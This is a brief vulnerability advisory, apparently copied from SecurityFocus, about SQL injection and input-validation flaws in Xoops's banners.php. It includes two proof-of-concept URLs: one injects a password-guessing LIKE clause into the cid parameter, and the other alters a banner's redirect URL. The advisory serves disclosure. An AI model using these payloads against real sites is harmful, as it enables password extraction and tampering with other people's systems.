9 lines
No EOL
494 B
Text
9 lines
No EOL
494 B
Text
source: http://www.securityfocus.com/bid/9166/info
|
|
|
|
Multiple vulnerabilities were reported in Xoops. These issues include SQL injection and input validation issues that will allow remote attackers to manipulate banners and local variables. Exploitation could compromise the software or have other consequences.
|
|
|
|
http://www.example.com/banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'
|
|
/*
|
|
|
|
http://www.example.com/banners.php?op=Change&cid=-1&bid=100&url=HTTP://WWW.NEWURL.C
|
|
OM |